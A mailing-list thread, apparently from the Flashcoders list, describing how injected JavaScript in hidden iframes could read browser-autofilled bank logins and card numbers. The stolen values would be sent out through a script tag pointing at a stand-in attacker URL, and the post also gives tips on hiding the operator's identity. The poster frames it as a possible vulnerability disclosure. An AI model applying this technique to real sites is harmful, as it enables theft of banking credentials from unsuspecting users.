< input type="text" name="email" autocomplete="off" >
just realized that you would have to replace the text field in the
submission form if it has autocomplete="off", and by redrawing the form
getting autocomplete to work its magic and have your JS go through the
testing process.
Anthony Pace wrote:
I was wondering if anyone here knew that this was possible and that
it, according to some sources that this is one of the reasons it
wasn't implemented in chrome:
I thought of this over two years ago; yet, never did anything with it
(lazy... really lazy... plus I am not criminal).
Flash banners that inject javascript, xss exploited forms, or outright
malicious websites, can place hidden iframes that load a bunch of
bank login sites, and using javascript take advantage of auto complete
form fill functions that require no user interaction, by reading the
value of the input fields. Once you have the user's card# or login
and pass, you can dynamically create and load a script tag with the
src set to
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah
and you have sent the data to a remote location. If interaction is
required for the auto complete function to work, get javascript to
cycle through the ascii and cycle focus back and forth from the field
till their is a value change.
The user would of course signed up for a hotmail account, through a
proxy, and used that hotmail account to setup a geocities account. I
know this wouldn't get everyone; yet, if you put it on a linkshare
site, I am betting a hacker could just watch the collected info pour in.
I got it to work on my laptop for a locally hosted site, (on I won't
tell with what browser and what parameters) and I am thinking about
submitting a proof of concept; yet, I am wondering if anyone else
wrote about this first, if I just missed it, and if there is someone
else's proof of concept it would look like I was ripping off?
___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
___
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders